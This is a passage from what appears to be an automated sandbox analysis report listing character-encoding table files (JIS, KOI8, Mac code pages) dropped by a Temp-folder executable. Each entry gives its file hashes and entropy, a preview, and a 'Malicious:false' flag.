                                                                                                                                                                                                                                                                                                                                SHA-256:480F61D0E1A75DEE59BF9A66DE0BB78FAAE4E87FD6317F93480412123277D442
                                                                                                                                                                                                                                                                                                                                SHA-512:4AFA210763DE9742626886D7D281AC15169CDC7A31D185F48D105190CA247AA014FB8F281AFCB4A0C31D2D55EE7D907B6A8E51FC4BEEDB9DB8C484E88CAA78A9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: jis0201, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D203E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.00000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):80453
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.274731552146978
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:R7Cyeug/RAEo7umlshyGYknyRXglMVw9bq7bYI45zh2cvA3FXwhZ1BrUc2C5oS5u:RgZJo7uNhbyO1ZiEXPcXwhZbrUPkBso2
                                                                                                                                                                                                                                                                                                                                MD5:F35938AC582E460A14646D2C93F1A725
                                                                                                                                                                                                                                                                                                                                SHA1:A922ACACE0C1A4A7DDC92FE5DD7A116D30A3686B
                                                                                                                                                                                                                                                                                                                                SHA-256:118EA160EF29E11B46DEC57AF2C44405934DD8A7C49D2BC8B90C94E8BAA6138B
                                                                                                                                                                                                                                                                                                                                SHA-512:D27CD9C9D67370C288036AACA5999314231F7070152FF7EEF1F3379E748EF9047001430D391B61C281FF69AB4F709D47F8FF5390873B5DEFD105371AB8FB8872
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: jis0208, double-byte.D.2129 0 77.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8.FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F.FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D.FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7.00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5.FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):70974
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.2631380488363284
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:WmU4+qNPpEzjKgGWJACVeCssX2Qt5E2+G7PBIv:LU4+qNaCgGW7VGK2o+0qv
                                                                                                                                                                                                                                                                                                                                MD5:F518436AC485F5DC723518D7872038E0
                                                                                                                                                                                                                                                                                                                                SHA1:15013478760463A0BCE3577B4D646ECDB07632B5
                                                                                                                                                                                                                                                                                                                                SHA-256:24A9D379FDA39F2BCC0580CA3E0BD2E99AE279AF5E2841C9E7DBE7F931D19CC0
                                                                                                                                                                                                                                                                                                                                SHA-512:2325705D4772A10CD81082A035BEAC85E6C64C7CCFA5981955F0B85CAF9A95D8A0820092957822A05C2E8E773F2089035ED5E76BF3FAF19B0E7E6AED7B4214D8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: jis0212, double-byte.D.2244 0 68.22.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000000000000000000000002D8.02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000.0000000000A100A600BF00000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000BA00AA00A900AE2122.00A4211600000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.463428231669408
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:KcJ5mTUmJvRju3ShVbsZiAMiZyb7PcSzm1XvRS3YcmchJQ3MAxSy:KmmgmOEVIwAMiw/Ptz8gBmRcAx5
                                                                                                                                                                                                                                                                                                                                MD5:E66D42CB71669CA0FFBCDC75F6292832
                                                                                                                                                                                                                                                                                                                                SHA1:366C137C02E069B1A93FBB5D64B9120EA6E9AD1F
                                                                                                                                                                                                                                                                                                                                SHA-256:7142B1120B993D6091197574090FE04BE3EA64FFC3AD5A167A4B5E0B42C9F062
                                                                                                                                                                                                                                                                                                                                SHA-512:6FBF7AF0302B4AA7EF925EFED7235E946EDA8B628AA204A8BBB0A3D1CB8C79DD37D9DD92A276AD14B55776FEBB3B55CF5881AC4013F95ED4E618E3B49771E8A5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: koi8-r, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.25002502250C251025142518251C2524252C2534253C258025842588258C2590.259125922593232025A02219221A22482264226500A0232100B000B200B700F7.25502551255204512553255425552556255725582559255A255B255C255D255E.255F25602561040125622563256425652566256725682569256A256B256C00A9.044E0430043104460434043504440433044504380439043A043B043C043D043E.043F044F044004410442044304360432044C044B04370448044D04490447044A.042E04100411042604140415042404130425041
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.439504497428066
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:K+TUmJvRju3ShVbsZiAMiZyb7PcSzmn3gXDRS3YcmchJQ3MAxSy:K+gmOEVIwAMiw/Ptz0KgBmRcAx5
                                                                                                                                                                                                                                                                                                                                MD5:D722EFEA128BE671A8FDA45ED7ADC586
                                                                                                                                                                                                                                                                                                                                SHA1:DA9E67F64EC4F6A74C60CB650D5A12C4430DCFF7
                                                                                                                                                                                                                                                                                                                                SHA-256:BBB729B906F5FC3B7EE6694B208B206D19A9D4DC571E235B9C94DCDD4A323A2A
                                                                                                                                                                                                                                                                                                                                SHA-512:FDF183C1A0D9109E21F7EEBC5996318AEDED3F87319A980C4E96BFE1D43593BDB693D181744C5C7E391A849783E3594234060A9F76116DE56F9592EF95979E63
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: koi8-u, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.25002502250C251025142518251C2524252C2534253C258025842588258C2590.259125922593232025A02219221A22482264226500A0232100B000B200B700F7.25502551255204510454255404560457255725582559255A255B0491255D255E.255F25602561040104032563040604072566256725682569256A0490256C00A9.044E0430043104460434043504440433044504380439043A043B043C043D043E.043F044F044004410442044304360432044C044B04370448044D04490447044A.042E04100411042604140415042404130425041
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):92877
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.32911747373862
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:XtWS2ymX62EztZ1Oyxk1uGtQPUNg0q+6XVfEFh:XtWnzEn1HxRQQPV0Eeh
                                                                                                                                                                                                                                                                                                                                MD5:599CEA614F5C5D01CDFA433B184AA904
                                                                                                                                                                                                                                                                                                                                SHA1:C2FFA427457B4931E5A92326F251CD3D671059B0
                                                                                                                                                                                                                                                                                                                                SHA-256:0F8B530AD0DECBF8DD81DA8291B8B0F976C643B5A292DB84680B31ECFBE5D00A
                                                                                                                                                                                                                                                                                                                                SHA-512:43D24B719843A21E3E1EDDFC3607B1B198542306C2EC8D621188CD39BA913D23678D39D12D8370CC1CE12828661AF0A5F14AD2B2BF99F62387C5E3E365BA1E75
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: ksc5601, double-byte.D.233F 0 89.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000030003001300200B72025202600A8300300AD20152225FF3C223C20182019.201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7.00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640.222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6.25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D.221D2235222B222C2208220B2286228722822283222A222922272228FFE20000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3601842107710365
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8jTUmJvRju3ShVbsZiAMiZyb7P4ZVPJS82WcVDX1MPEd4RPMppJ8K:8jgmOEVIwAMiw/PsVoy24VMppiK
                                                                                                                                                                                                                                                                                                                                MD5:CADFBF5A4C7CAD984294284D643E9CA3
                                                                                                                                                                                                                                                                                                                                SHA1:16B51D017001688A32CB7B15DE6E7A49F28B76FD
                                                                                                                                                                                                                                                                                                                                SHA-256:8F3089F4B2CA47B7AC4CB78375B2BFAC01268113A7C67D020F8B5B7F2C25BBDA
                                                                                                                                                                                                                                                                                                                                SHA-512:3941ACA62CF59BF6857BA9C300B4236F18690DE1213BB7FCFA0EC87DCD71152849F1DEAFB470CA4BC2ACC2C0C13D7FD57661BFC053960ADD7570DE365AE7E63C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macCentEuro, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179.017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC.202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E.012F012A22642265012B0136220222110142013B013C013D013E0139013A0145.0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C.20132014201C201D2018201900F725CA014D0154015501582039203A01590156.01570160201A201E0161015A015B00C101
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3293096097500965
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8ULyTUmJvRju3ShVbsZiAMiZyb7P4SNMdNxOZwl+KR8DklJyseQWkv:8ULygmOEVIwAMiw/P34+KR8DklEswm
                                                                                                                                                                                                                                                                                                                                MD5:F13D479550D4967A0BC76A60C89F1461
                                                                                                                                                                                                                                                                                                                                SHA1:63F44E818284384DE07AB0D8B0CD6F7EBFE09AB9
                                                                                                                                                                                                                                                                                                                                SHA-256:8D0B6A882B742C5CCE938241328606C111DDA0CB83334EBEDCDA17605F3641AE
                                                                                                                                                                                                                                                                                                                                SHA-512:80AB9DCAAC1A496FD2CA6BE9959FE2DE201F504D8A58D114F2FF5D1F6AAD507F052B87D29D3EBA69093C3D965CC4C113C9EA6DB8EEBB67BD620ADF860CA2CC35
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macCroatian, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8.221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8.00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153.01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB.201300B7201A201E203000C2010700C101
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3482225358368565
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8dTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmh:8dgmOEVIwAMiw/Pr5NY3k9nsmh
                                                                                                                                                                                                                                                                                                                                MD5:60FFC8E390A31157D8646AEAC54E58AE
                                                                                                                                                                                                                                                                                                                                SHA1:3DE17B2A5866272602FB8E9C54930A4CD1F3B06C
                                                                                                                                                                                                                                                                                                                                SHA-256:EB135A89519F2E004282DED21B11C3AF7CCB2320C9772F2DF7D1A4A1B674E491
                                                                                                                                                                                                                                                                                                                                SHA-512:3644429A9BD42ADC356E1BD6FCFABEE120E851348B538A4FE4903B72A533174D7448A6C2DA71219E4CD5D0443C0475417D54C8E113005DF2CA20C608DE5E3306
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macCyrillic, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.202000B0049000A300A7202200B6040600AE00A9212204020452226004030453.221E00B122642265045600B504910408040404540407045704090459040A045A.0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455.20132014201C201D2018201900F7201E040E045E040F045F211604010451044F.0430043104320433043404350436043704
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8086748658227827
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:87JM0UmJvRjuyfqYCsUBOdXBCbtwHviANskNWkiXFtoE4OSFgHrBPkq:87KfmOEqYCs6CXRPiANHWkiXFt9XSMdf
                                                                                                                                                                                                                                                                                                                                MD5:EBD121A4E93488A48FC0A06ADE9FD158
                                                                                                                                                                                                                                                                                                                                SHA1:A40E6DB97D6DB2893A072B2275DC22E2A4D60737
                                                                                                                                                                                                                                                                                                                                SHA-256:8FBCC63CB289AFAAE15B438752C1746F413F3B79BA5845C2EF52BA1104F8BDA6
                                                                                                                                                                                                                                                                                                                                SHA-512:26879ABE4854908296F32B2BB97AEC1F693C56EC29A7DB9B63B2DA62282F2D2EDAE9D50738595D1530731DF5B1812719A74F50ADF521F80DD5067F3DF6A3517C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macDingbats, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.00202701270227032704260E2706270727082709261B261E270C270D270E270F.2710271127122713271427152716271727182719271A271B271C271D271E271F.2720272127222723272427252726272726052729272A272B272C272D272E272F.2730273127322733273427352736273727382739273A273B273C273D273E273F.2740274127422743274427452746274727482749274A274B25CF274D25A0274F.27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F.F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000276127622763276427652766276726632666266526602460246124622463.2464246524662467246824692776277727782779277A277B277C277D277E277F.2780278127822783278427852786278727882789278A278B278C278D278E278F.2790279127922793279421922194219527982799279A279B279C279D279E279F.27A027A127A227A327A427A527A627A727
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1093
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4271472017271556
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8dOTUmJvRju3ShVbsZiAMiZyb7P4Hlb7BMM2aSYjsSkUEkp1FsOSUTime:8kgmOEVIwAMiw/Pg7K23s0x1FsOJTime
                                                                                                                                                                                                                                                                                                                                MD5:14AD68855168E3E741FE179888EA7482
                                                                                                                                                                                                                                                                                                                                SHA1:9C2AD53D69F5077853A05F0933330B5D6F88A51C
                                                                                                                                                                                                                                                                                                                                SHA-256:F7BFF98228DED981EC9A4D1D0DA62247A8D23F158926E3ACBEC3CCE379C998C2
                                                                                                                                                                                                                                                                                                                                SHA-512:FB13F32197D3582BC20EEA604A0B0FD7923AE541CCEB3AF1CDE36B0404B8DB6312FB5270B40CBC8BA4C91B9505B57FB357EB875E8AFB3DB76DFB498CE17851ED
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macGreek, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8.00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC.2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7.039100B12264226500A503920395039603970399039A039C03A603AB03A803A9.03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153.20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F.03CD03B103B203C803B403B503C603B303B70
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1095
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3292041026777457
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8KTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjY4g4JysAWD:8KgmOEVIwAMiw/Pf2YRMFBEszD
                                                                                                                                                                                                                                                                                                                                MD5:6D52A84C06970CD3B2B7D8D1B4185CE6
                                                                                                                                                                                                                                                                                                                                SHA1:C434257D76A9FDF81CCCD8CC14242C8E3940FD89
                                                                                                                                                                                                                                                                                                                                SHA-256:633F5E3E75BF1590C94AB9CBF3538D0F0A7A319DB9016993908452D903D9C4FD
                                                                                                                                                                                                                                                                                                                                SHA-512:711F4DC86DD609823BF1BC5505DEE9FA3875A8AA7BCA31DC1B5277720C5ABE65B62E8A592FC55D99D1C7CA181FDDC2606551C43A9D12489B9FECFF152E9A3DCF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macIceland, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE.00FD00B7201A201E203000C200CA00C100C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):48028
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3111639331656635
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:ehuW1PJnT9TO7RaQiPCLUKr7KBi9FrOLdtHJ:eZPV9KuqTxFGXp
                                                                                                                                                                                                                                                                                                                                MD5:105B49F855C77AE0D3DED6C7130F93C2
                                                                                                                                                                                                                                                                                                                                SHA1:BA187C52FAE9792DA5BFFBEAA781FD4E0716E0F6
                                                                                                                                                                                                                                                                                                                                SHA-256:2A6856298EC629A16BDD924711DFE3F3B1E3A882DDF04B7310785D83EC0D566C
                                                                                                                                                                                                                                                                                                                                SHA-512:5B5FBE69D3B67AF863759D92D4A68481EC2211FF84ED9F0B3BD6129857966DE32B42A42432C44B9246C9D0D9C4C546CD3C6D13FF49BD338192C24AD053C0602E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macJapan, multi-byte.M.003F 0 46.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1093
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3361385497578406
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8TTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjBtRg4JysAWD:8TgmOEVIwAMiw/P32YRMTtRBEszD
                                                                                                                                                                                                                                                                                                                                MD5:30BECAE9EFD678B6FD1E08FB952A7DBE
                                                                                                                                                                                                                                                                                                                                SHA1:E4D8EA6A0E70BB793304CA21EB1337A7A2C26A31
                                                                                                                                                                                                                                                                                                                                SHA-256:68F22BAD30DAA81B215925416C1CC83360B3BB87EFC342058929731AC678FF37
                                                                                                                                                                                                                                                                                                                                SHA-512:E87105F7A5A983ACEAC55E93FA802C985B2B19F51CB3C222B4C13DDCF17C32D08DF323C829FB4CA33770B668485B7D14B7F6B0CF2287B0D76091DE2A675E88BD
                                                                                                                                                                                                                                                                                                                                Malicious:false
